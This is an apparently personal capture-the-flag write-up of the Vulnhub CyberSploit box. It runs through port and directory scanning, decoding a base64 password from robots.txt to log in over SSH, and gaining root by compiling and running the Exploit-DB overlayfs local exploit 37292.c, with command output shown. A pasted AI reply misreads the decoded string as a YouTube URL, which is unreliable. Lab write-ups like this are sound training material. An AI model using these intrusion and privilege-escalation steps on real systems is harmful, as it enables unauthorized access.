April 20th 2023

OG Vulnhub box:,506/

Since target was given I don't have to run netdiscover to find target:

Target is:

$ nmap -p- -sV

Starting Nmap 7.93 ( ) at 2023-04-20 17:07 EDT

Nmap scan report for

Host is up (0.0013s latency).

Not shown: 65533 closed tcp ports (conn-refused)


22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .

Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds

Check firefox on 80

This image shows up. Time to check directories and subdirectories. Time to run dirb and subdirwith the former for directories( and latter for subdirectories such as


??$ dirb  


DIRB v2.22    

By The Dark Raver


START_TIME: Thu Apr 20 21:19:08 2023


WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


                                                                    GENERATED WORDS: 4612

---- Scanning URL: ----

                                                                    + (CODE:403|SIZE:289)                

+ (CODE:200|SIZE:3757743)              

+ (CODE:200|SIZE:2333)                  

+ (CODE:200|SIZE:2333)             

+ (CODE:200|SIZE:53)                   

+ (CODE:200|SIZE:53)               

+ (CODE:403|SIZE:294)           



END_TIME: Thu Apr 20 21:19:12 2023


Saw robots.txt so going there and I find a base64 looking string


AI decoding with cyberchef verification yields

The text you provided appears to be a Base64 encoded string. Let me decode it for you:


Decoded result: "cybersploit{}"

It seems to be a URL for a YouTube channel named "cybersploit".

Checking page source code also nets the user itsskv

Try logging into ssh now with the username and the base64 password

ls in . and see flag2.txt but after a cat the flag is another file. Checking out local.txt I find a string of text which I submit as the flag and get the first 50%.

Now for root.

Checking the OS version first

itsskv@cybersploit-CTF:~$ uname -a

Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

itsskv@cybersploit-CTF:~$ cat /etc/issue

Ubuntu 12.04.5 LTS \n \l


Now to check for local exploits on Ubuntu 12.04.5 LTS on exploitdb

Now downloading one of the exploits for local. Will use the overlayFS one as it's the "latest" one


??$ scp 37292.c itsskv@

itsskv@'s password: 


Now the c exploit is on the target machine for a local privesc

itsskv@cybersploit-CTF:~$ ls

37292.c    Downloads         local.txt  Public

Desktop    examples.desktop  Music      Templates

Documents  flag2.txt         Pictures   Videos


Now time to compile the c code then run the program

itsskv@cybersploit-CTF:~$ gcc 37292.c 

itsskv@cybersploit-CTF:~$ ./a.out 

spawning threads

mount #1

mount #2

child threads done

/etc/ created

creating shared library

# whoami



Opportunity to upgrade shell to a more stable one here. Use shell upgrade commands.

Now to look through root's files

# ls

37292.c    Downloads  Public     a.out             local.txt

Desktop    Music      Templates  examples.desktop

Documents  Pictures   Videos     flag2.txt

# cd /

# ls

bin    home            media  run      tmp

boot   initrd.img      mnt    sbin     usr

cdrom  initrd.img.old  opt    selinux  var

dev    lib             proc   srv      vmlinuz

etc    lost+found      root   sys      vmlinuz.old

# cd root

# ls

Desktop    Downloads  Pictures  Templates  finalflag.txt

Documents  Music      Public    Videos     proof.txt

# cat finalflag.txt

Your flag is in another file...

# cat proof.txt


And Boot2Root 🐱‍💻